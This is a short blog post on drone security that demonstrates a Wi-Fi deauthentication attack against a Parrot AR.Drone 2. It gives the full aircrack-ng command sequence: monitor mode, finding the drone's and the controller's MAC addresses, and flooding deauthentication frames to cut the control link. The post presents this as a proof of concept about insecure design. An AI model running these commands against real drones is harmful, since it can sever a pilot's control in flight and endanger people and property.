Hacking Commercial Drones
Unmanned Aerial Systems (UAS), populary called Drones, has been tech sensation nowadays with available ones in department stores close to you focusing in recreational use. Despite the advantages of using them (in a great range of services), this post aims to present lack of security concerns during design that impacts directly safety.
This article was thought after a video published by John Hopkins University:
By video it is possible to recognize that they used drones from manufacturer Parrot (model Bebop), once we own a Parrot AR.drone 2, we guess that researches found most of issues due use of Wireless (IEEE 802.11) for remote controller.
Wireless Networks are susceptible to many attacks such as key cracking, man in the middle, network injection and many others.
In this post, the Proof of Concept is based in a “Deauthentication/Dissociation” attack, known as denial of service attack, which breaks the communication link between the mobile phone (controller) and drone (access point). Requiring aircrack-ng suite for this task, more specific the scripts airodump-ng (capture 802.11 frames) and aireplay-ng (create traffic).
Development
– Put wireless adapter on monitor mode
airmon-ng start wlan0
– Discover AR.Drone MAC address
airodump-ng wlan0mon //In this case: 90:03:B7:38:F5:B8
– Discover the client connected to AR.drone BSSID
airodump-ng wlan0mon -c 1 –bssid 90:03:B7:38:F5:B8 //In this case: 44:80:EB:00:0B:41
– Use aireplay-ng to disassociate the client
aireplay-ng -0 1000 -a 90:03:B7:38:F5:B8 -c 44:80:EB:00:0B:41 wlan0mon
-0 is the parameter for the Deauthentication attack, 1000 is the number os deaths, -a MAC address of Parrot AR.drone, -c the MAC address of the client and the wlan0mon the interface.
Video
Result
Conclusion
This post points out the risk of using technologies without judgment about security and its impacts on operation. Prior design requirements about security could lead to a more secure product which impacts directly safety and business aspects.